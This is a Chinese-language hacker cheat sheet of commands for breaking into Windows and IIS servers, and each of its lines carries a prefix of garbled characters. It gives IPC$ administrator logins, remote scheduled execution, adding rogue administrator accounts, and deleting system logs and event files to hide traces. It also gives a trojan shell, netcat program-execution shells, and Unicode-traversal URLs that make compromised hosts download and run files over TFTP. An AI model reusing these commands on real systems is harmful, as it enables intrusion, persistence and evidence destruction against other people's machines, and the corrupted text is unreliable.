网管和黑客都必须知道的命令
I�_*�>E�A� 常用的几条NET命令:
H=RV ��M� BD#;3��?�| (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
d��$~b`��� /iuN���dh� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
G��ZX!i�T ~(]DNXB8I` (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
,T�oE�K�Id qM ��!q,�Q (查看远程主机时间) net time \\IP地址
U�7�e�Q-�r �R�_&z2��I (定时启动某个程序) at \\IP地址 02:18 readme.exe
8|Y^Jn\p5u ��:P�"Gy�m (查看共享) net view \\IP地址
rO%+�)M$�A 2�U{RA'�s� (查看netbios工作组列表) nbtstat -A IP地址
FRk_x�xe"K *{s��[$}uQ (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
��k ,(:[3J �i~L7h=_�_ (这两条把自己增加到管理员组): net user 用户名 密码 /add
�+= ~}P�F HbD�B��?s< net localgroup Administrators 用户名 /add
�D�}��3fx[ ���Vp^s�ER (断开连接) net use \\IP地址\ipc$ /delete
H�,�~In2Z 5&@���U� T 扫尾:
vJUB;���hD NmF�2E�+'� del C:\winnt\system32\logfiles\*.*
�Z+4O�a�f! ��Z5-'|h$| del C:\winnt\ssytem32\config\*.evt
�t O>qd#I� �)i�x�E��� del C:\winnt\system32\dtclog\*.*
Nq�6�CvDXi 7~f6j�:{|z del C:\winnt\system32\*.log
��M0�
�8Y oU?��X"B9� del C:\winnt\system32\*.txt
�W�^Y(FUy~ ���%BLKB%5 del C:\winnt\*.txt
!�{��l�b�# !:{_<�C"D� del C:\winnt\*.log
k��sp':2d} �
N&.p\T&t 一、netsvc.exe
TaT&x_v^~a %TgM-F,�8� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
9Bw"VN]��W �_Z2)e*�( netsvc /list \\IP地址
e5KF��~�0` Sn�&%e�pi� netsvc schedule \\IP地址 /query
Y|n�Tc�.�A Mv�=;+?z! netsvc \\IP地址 schedule /start
\s'6��)��_ e)"cm;BJ^P 二、OpenTelnet.exe
L�r:K0A.Ch m
0�P�F�"( 远程启动主机的Telnet服务,并绑定端口到7878,例如:
oX��,M;;Yq ^umAfk5r?H OpenTelnet \\IP地址 用户名 密码 1 7878
rnE�'gH(V' Su�#1�yw�> 然后就可以telnet到主机的7878端口,进入DOS方式下:
�)�&-E@% \ RBw�V�+X[B telnet IP地址 7878
^yTN�(\�9� >.�4Sx~VH2 三、winshell.exe
kz�XW<��V9 Z�4�' v��� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
g\'84:*�J\ h��+(s/o?\ p Path (查看winshell主程序的路径信息)
��7R�J�W�� �< ��*O�F b reBoot (重新启动机器)
b@�hoH)<9E |D:0�BATRP d shutDown (关闭机器)
'�)c��u/� Z9I.�/s��9 s Shell (执行后你就会看到可爱的“C:\>”)
q't�T�)IgD iX� p8u�** x eXit (退出本次登录会话,此命令并不终止winshell的运行)
B,T�.bg�p\ `^vD4�qD�| CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
_T�z�!~�z� b\��Ub<pE 四、3389登陆器,GUI方式登录远程主机的
1|� DI'e[X ��# 95/,k 五、elsave.exe
q%��Pnx_RB \gpKQ�t��0 事件日志清除工具
|\�t_I�~de �HfPeR8I%i elsave -s \\IP地址 -l "application" -C
g*M3;��G
O�~VUViS6$ elsave -s \\IP地址 -l "system" -C
%�BKTN@;7 �k�$!&3Rh� elsave -s \\IP地址 -l "security" -C
Rw`s O:eZ� �Rim}D�fO/ 执行后成功清除应用程序日志,系统日志,安全日志
ps�{(UYM=b VuW1��9-�G 六、hbulot.exe
~��Y[1�M�e Q�Cw<* Id+ 开启win2kserver和winxp的3389服务
?dYD�fyFfB �ntejFy9_� hbulot [/r]
�v( �B4Bz2 tEj5WEnNE8 使用/r表示安装完成后自动重起目标使设置生效。
<��n{9pZ5. l ,�.��;dw 七、nc.exe(netcat.exe)
=@>&kU%�$& w?�q"%F;�/ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
PYe�>`X�? RJSgt�s "F 想要连接到某处: nc [-options] hostname port[s] [ports] ...
#Uu"olX7�� @�gO�g���s 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
;r�']"JmF, [>8���6��i 参数:
�[tN��/}_] W�yETg!�b[ -e prog 程序重定向,一旦连接,就执行 [危险!!]
CiSG=o��bw xj<SnrrC]u -g gateway source-routing hop point[s], up to 8
��M�> <� � �V*~5�*OwB -G num source-routing pointer: 4, 8, 12, ...
X��EI��]T~ (
9l|^w�[" -h 帮助信息
K]l)��z* I pl�q\�D�.C -i secs 延时的间隔
14R)�)Dz�" =�S�q7U^(> -l 监听模式,用于入站连接
y��8@!�2O4 �sB��wgl�9 -n 指定数字的IP地址,不能用hostname
Ih0GzyU�*4 �� ^8�iy(� -o file 记录16进制的传输
m[f\I^�\%8 T$�e_��ao| -p port 本地端口号
I
f�(��_$> P�$��b�o8* -r 任意指定本地及远程端口
�EbQ}�w"{� �5�tL6�R�3 -s addr 本地源地址
�*QX$Mo^�E iu����'yB� -u UDP模式
�J�Y,+�eD� (ho�qLL\}k -v 详细输出——用两个-v可得到更详细的内容
xjYFTb}��! >/*\x��g&J -w secs timeout的时间
<#U��vLl�l `t
-3(�>P� -z 将输入输出关掉——用于扫描时
w'!��gLta 八、TFTPD32.EXE
[�g?� N�U] z,tax`��O 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�Xqy{=�:�0 -]e@c�evy� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
a/ZfPl0Ns[ ^R�yrU��b� 然后可以直接令文件运行:
,x�/j&S9!� �"'Q:�%�_; http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
]x|sT��Kv2 �jcj)9;n=! 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
/%�)J+K�)� �~V�K�w%WK 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
`PL!>oa(8 .1@5*�xQ5O 一、一 Xscan命令行运行参数说明:
KR*/ye�G!E "�O4Z).5q3 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
3-05y!vbcE +vP1DXtj�( 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
w%ForDB�>P e�pnDvz\�� xscan -file <主机列表文件名> <检测项目> [其他选项]
O �
tr@jgw ]WG�\+�1x9 其中<检测项目> 含义如下:
��<W��d$�6 }�\W3a_,v) -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
&}]Wbk�4:
)JP�c�Sy* -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Wg�[`H=)�Q K"#}R<k8:A -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�z�ri��<'W S%4�K��-�I -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
XxIU�B(.QI \�h-�[�u%� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�wcO+P7�g� ,�Y*�f��] [其他选项] 含义如下:
&^�E��k��M �f��K�fi�� -v: 显示详细扫描进度
�,O2F�}5|; ;�23F8M%wH -p: 跳过Ping不通的主机
[8"nRlX��H V;m3=k�0U� -o: 跳过没有检测到开放端口的主机
^^Iu�s ]��
G~�JQcJFj -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
